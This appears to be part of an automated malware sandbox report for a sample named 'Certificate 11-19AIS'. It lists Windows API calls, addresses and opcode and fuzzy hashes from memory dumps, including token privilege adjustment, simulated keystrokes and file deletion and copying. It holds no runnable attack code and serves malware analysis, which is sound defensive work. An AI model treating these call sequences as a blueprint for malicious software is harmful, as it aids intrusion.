                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: _free
                                                                              • String ID:
                                                                              • API String ID: 269201875-0
                                                                              • Opcode ID: b5bcef8180ff92f96c138d35a56aaf959578717d3ea5e62681c305eb34bf6510
                                                                              • Instruction ID: 95660e1e777c10a76627823824de2004fbdb39cd954db39c485446f37429795d
                                                                              • Opcode Fuzzy Hash: b5bcef8180ff92f96c138d35a56aaf959578717d3ea5e62681c305eb34bf6510
                                                                              • Instruction Fuzzy Hash: E031C235204528DFCB11AF00D484BEE77B5FF48324F20844EEA95AB386DBB4A981CF91
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 43e9f19bbf0f4e0f4f713d3845621ed2db024e5fca9b3cb4e3bc96a82ab894f6
                                                                              • Instruction ID: 7693d3d2f73d3851491a9f4cbf8cb8a1613bee38b0a301bc08dd5bfc35c8e86b
                                                                              • Opcode Fuzzy Hash: 43e9f19bbf0f4e0f4f713d3845621ed2db024e5fca9b3cb4e3bc96a82ab894f6
                                                                              • Instruction Fuzzy Hash: 87413C70604651CFDB24DF18D484F1ABBE1BF45314F1989ACE99A4B362C376E885CF92
                                                                              APIs
                                                                                • Part of subcall function 007B4214: FreeLibrary.KERNEL32(00000000,?), ref: 007B4247
                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007B39FE,?,00000001), ref: 007B41DB
                                                                                • Part of subcall function 007B4291: FreeLibrary.KERNEL32(00000000), ref: 007B42C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Library$Free$Load
                                                                              • String ID:
                                                                              • API String ID: 2391024519-0
                                                                              • Opcode ID: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                                              • Instruction ID: 18cf4a56bfdda506b141e789ae88e44f8712564367fe06a2903ea85b9afe6632
                                                                              • Opcode Fuzzy Hash: 91ffeea96a39850cece716f61f057040bf428e1bbf610b98bed5e5b6a3f04954
                                                                              • Instruction Fuzzy Hash: 3E11A331600316FADB14AB74DD0AFEE77E9BF80700F108429F596E61C2DE78DA44AB61
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 7703c2bca3e6e601299ffd6bc231f885d411e6912a50870ae6654bcd3c109db1
                                                                              • Instruction ID: 0bde969eacb6946daf17023a2ffab11ae772fa0cc7af09b8e0ea9f9c4a32ada0
                                                                              • Opcode Fuzzy Hash: 7703c2bca3e6e601299ffd6bc231f885d411e6912a50870ae6654bcd3c109db1
                                                                              • Instruction Fuzzy Hash: CF211370608601CFDB24DF68D448F6ABBE1BF84304F14496CFA9A4B222D739E855CF92
                                                                              APIs
                                                                              • ___lock_fhandle.LIBCMT ref: 007DAFC0
                                                                                • Part of subcall function 007D7BDA: __getptd_noexit.LIBCMT ref: 007D7BDA
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit$___lock_fhandle
                                                                              • String ID:
                                                                              • API String ID: 1144279405-0
                                                                              • Opcode ID: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                                              • Instruction ID: 44d5191a03d2bd5c9a23f0a3127ebaed4ff59e5037b95b8ab9bbbb62a5afcf6a
                                                                              • Opcode Fuzzy Hash: 69067e5cfc3488c5833bdaf65f90536a47a55d4d3bfbd6261ddb761ebb3922c9
                                                                              • Instruction Fuzzy Hash: 5F11B2B2814600DFD7167FA488497593A70AF41332F2A4243E4345F3E2E7BD8D40DBA1
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction ID: 69323c21fa2d568ed5bdeb2366140e792cc5d9efba7a8bceb6f95f34f2ee739a
                                                                              • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                                              • Instruction Fuzzy Hash: A001313150010DFECF05EFA4C9969FEBB74EF20344F10806AB566971A6EA349A89DB61
                                                                              APIs
                                                                              • __lock_file.LIBCMT ref: 007D2AED
                                                                                • Part of subcall function 007D7C0E: __getptd_noexit.LIBCMT ref: 007D7C0E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __getptd_noexit__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2597487223-0
                                                                              • Opcode ID: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                                              • Instruction ID: 29cc6d227d8e77cb9a8dbbc78b06f3450e62dc4820592faffe986d1d2906b9d2
                                                                              • Opcode Fuzzy Hash: 922eab3eea06c829b94da4be18bd27774adefac99dfced5fe9c16a371b5e10ca
                                                                              • Instruction Fuzzy Hash: F3F06231600205FBDF21AF648C0A79F36B5BF50320F158457F814AA392D77C8A53DB51
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,007B39FE,?,00000001), ref: 007B4286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: FreeLibrary
                                                                              • String ID:
                                                                              • API String ID: 3664257935-0
                                                                              • Opcode ID: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                                              • Instruction ID: e3398e529660534369c17c1a942e03bc556849aeebad35bcd210447285a74044
                                                                              • Opcode Fuzzy Hash: 6066e3f9cad01809f29f7b58257e70e73d747287529f8f63e75a97635ac6950d
                                                                              • Instruction Fuzzy Hash: 7BF03971505702DFCB349F64E894996BBF4BF043253248A3EF1D682612C77A9840EF50
                                                                              APIs
                                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007B40C6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LongNamePath
                                                                              • String ID:
                                                                              • API String ID: 82841172-0
                                                                              • Opcode ID: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                                              • Instruction ID: 374f1127884611ea9cb1db00219a5075a28fe3ebfc51dd42833b221a85267b35
                                                                              • Opcode Fuzzy Hash: b8d010f60d540e0c66091f6f5d3fa2ec49d17ab440838d601d11195c0918941c
                                                                              • Instruction Fuzzy Hash: 7FE0CD365002245BC711A654DC46FEE77ADDFC8690F094175F905D7244D96899819690
                                                                              APIs
                                                                              • Sleep.KERNELBASE(000001F4), ref: 00EF2989
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1318117167.0000000000EF0000.00000040.00000020.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_ef0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction ID: c6009c7d80cfad0ae66c7a23cf31bcdc47a3e1a28b144951d49b5f37c92d4757
                                                                              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                              • Instruction Fuzzy Hash: 13E0E67494020DDFDB00DFB4D5496AD7BB4EF04301F100165FD01E2280D7709D508A62
                                                                              APIs
                                                                                • Part of subcall function 007CB34E: GetWindowLongW.USER32(?,000000EB), ref: 007CB35F
                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0081F87D
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081F8DC
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0081F919
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0081F940
                                                                              • SendMessageW.USER32 ref: 0081F966
                                                                              • _wcsncpy.LIBCMT ref: 0081F9D2
                                                                              • GetKeyState.USER32(00000011), ref: 0081F9F3
                                                                              • GetKeyState.USER32(00000009), ref: 0081FA00
                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0081FA16
                                                                              • GetKeyState.USER32(00000010), ref: 0081FA20
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0081FA4F
                                                                              • SendMessageW.USER32 ref: 0081FA72
                                                                              • SendMessageW.USER32(?,00001030,?,0081E059), ref: 0081FB6F
                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0081FB85
                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0081FB96
                                                                              • SetCapture.USER32(?), ref: 0081FB9F
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FC03
                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0081FC0F
                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0081FC29
                                                                              • ReleaseCapture.USER32 ref: 0081FC34
                                                                              • GetCursorPos.USER32(?), ref: 0081FC69
                                                                              • ScreenToClient.USER32(?,?), ref: 0081FC76
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0081FCD8
                                                                              • SendMessageW.USER32 ref: 0081FD02
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0081FD41
                                                                              • SendMessageW.USER32 ref: 0081FD6C
                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0081FD84
                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0081FD8F
                                                                              • GetCursorPos.USER32(?), ref: 0081FDB0
                                                                              • ScreenToClient.USER32(?,?), ref: 0081FDBD
                                                                              • GetParent.USER32(?), ref: 0081FDD9
                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0081FE3F
                                                                              • SendMessageW.USER32 ref: 0081FE6F
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FEC5
                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0081FEF1
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0081FF19
                                                                              • SendMessageW.USER32 ref: 0081FF3C
                                                                              • ClientToScreen.USER32(?,?), ref: 0081FF86
                                                                              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0081FFB6
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0082004B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                              • String ID: @GUI_DRAGID$F
                                                                              • API String ID: 2516578528-4164748364
                                                                              • Opcode ID: b736ee6f569b264165df8d53b6da330806e39fb7c62b9a537629328dd7cee2f1
                                                                              • Instruction ID: bae3dc7e1597e2ac9df6fd61bfef0988fe0a3873c49bc4b31f94e0524ec8e3ed
                                                                              • Opcode Fuzzy Hash: b736ee6f569b264165df8d53b6da330806e39fb7c62b9a537629328dd7cee2f1
                                                                              • Instruction Fuzzy Hash: A832AE74604345EFDB10CF68C888BAABBA8FF49358F140A29F659C72A2D731DC95CB51
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0081B1CD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: %d/%02d/%02d
                                                                              • API String ID: 3850602802-328681919
                                                                              • Opcode ID: 7ea96b4e6c3423cbcf0809e2ffb19a5c654fdb77eeda891e84f6a32975d3ed3b
                                                                              • Instruction ID: 0e9190fc925f1724f2c2c043a1c2da2507dcaf14d53e98c73d9de745e2c46219
                                                                              • Opcode Fuzzy Hash: 7ea96b4e6c3423cbcf0809e2ffb19a5c654fdb77eeda891e84f6a32975d3ed3b
                                                                              • Instruction Fuzzy Hash: BF12BDB1600248ABEB289F68DC49FEE7BB8FF85710F104519F919DB2D1EB748981CB51
                                                                              APIs
                                                                              • GetForegroundWindow.USER32(00000000,00000000), ref: 007CEB4A
                                                                              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00823AEA
                                                                              • IsIconic.USER32(000000FF), ref: 00823AF3
                                                                              • ShowWindow.USER32(000000FF,00000009), ref: 00823B00
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823B0A
                                                                              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00823B20
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00823B27
                                                                              • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00823B33
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B44
                                                                              • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00823B4C
                                                                              • AttachThreadInput.USER32(00000000,?,00000001), ref: 00823B54
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823B57
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B6C
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B77
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B81
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B86
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B8F
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823B94
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00823B9E
                                                                              • keybd_event.USER32(00000012,00000000), ref: 00823BA3
                                                                              • SetForegroundWindow.USER32(000000FF), ref: 00823BA6
                                                                              • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00823BCD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                              • String ID: Shell_TrayWnd
                                                                              • API String ID: 4125248594-2988720461
                                                                              • Opcode ID: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                                              • Instruction ID: 1fabadac65af12bc8ba245fa61491fc924b4b8703d76be4a84101c6eda102c94
                                                                              • Opcode Fuzzy Hash: 4f56ad03dd88098a9689ab6b7e4baa2a4f84ad9d4eef698f4f69f0b1be5601e1
                                                                              • Instruction Fuzzy Hash: 2B31B4B1A403287BEB202F75AC4AF7F7E6CFB84B60F104415FA05EB1D1D6B45D41AAA0
                                                                              APIs
                                                                                • Part of subcall function 007EB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007EB180
                                                                                • Part of subcall function 007EB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007EB1AD
                                                                                • Part of subcall function 007EB134: GetLastError.KERNEL32 ref: 007EB1BA
                                                                              • _memset.LIBCMT ref: 007EAD08
                                                                              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 007EAD5A
                                                                              • CloseHandle.KERNEL32(?), ref: 007EAD6B
                                                                              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007EAD82
                                                                              • GetProcessWindowStation.USER32 ref: 007EAD9B
                                                                              • SetProcessWindowStation.USER32(00000000), ref: 007EADA5
                                                                              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 007EADBF
                                                                                • Part of subcall function 007EAB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007EACC0), ref: 007EAB99
                                                                                • Part of subcall function 007EAB84: CloseHandle.KERNEL32(?,?,007EACC0), ref: 007EABAB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                                              • String ID: $default$winsta0
                                                                              • API String ID: 2063423040-1027155976
                                                                              • Opcode ID: db6069e9f2fa650b0334326ae19ce935543bfa595af08433ca691d0f2913e326
                                                                              • Instruction ID: 635e213e6663234c848f59b58428df92910ba6b3a2582f172e5a64bf1853e38d
                                                                              • Opcode Fuzzy Hash: db6069e9f2fa650b0334326ae19ce935543bfa595af08433ca691d0f2913e326
                                                                              • Instruction Fuzzy Hash: 3381ACB1902289FFDF119FA5DC4AAEE7B78FF08304F048119F824A6161E7399E54DB61
                                                                              APIs
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007F5FA6,?), ref: 007F6ED8
                                                                                • Part of subcall function 007F6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007F5FA6,?), ref: 007F6EF1
                                                                                • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F727B
                                                                                • Part of subcall function 007F725E: __wsplitpath.LIBCMT ref: 007F728E
                                                                                • Part of subcall function 007F72CB: GetFileAttributesW.KERNEL32(?,007F6019), ref: 007F72CC
                                                                              • _wcscat.LIBCMT ref: 007F6149
                                                                              • _wcscat.LIBCMT ref: 007F6167
                                                                              • __wsplitpath.LIBCMT ref: 007F618E
                                                                              • FindFirstFileW.KERNEL32(?,?), ref: 007F61A4
                                                                              • _wcscpy.LIBCMT ref: 007F6209
                                                                              • _wcscat.LIBCMT ref: 007F621C
                                                                              • _wcscat.LIBCMT ref: 007F622F
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 007F625D
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F626E
                                                                              • MoveFileW.KERNEL32(?,?), ref: 007F6289
                                                                              • MoveFileW.KERNEL32(?,?), ref: 007F6298
                                                                              • CopyFileW.KERNEL32(?,?,00000000), ref: 007F62AD
                                                                              • DeleteFileW.KERNEL32(?), ref: 007F62BE
                                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 007F62E1
                                                                              • FindClose.KERNEL32(00000000), ref: 007F62FD
                                                                              • FindClose.KERNEL32(00000000), ref: 007F630B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                               • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                              • String ID: \*.*$p1ou`Kpu
                                                                              • API String ID: 1917200108-531078103
                                                                              • Opcode ID: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
                                                                              • Instruction ID: e7f3eb367834a6ca621a631a357f1b63a7ed5c9b47b60bce95ee39abce4f115f
                                                                              • Opcode Fuzzy Hash: a61733ba678fe4cfaffd5b3788bee1b9c1f824b23b88285726fcf2260c4d3885
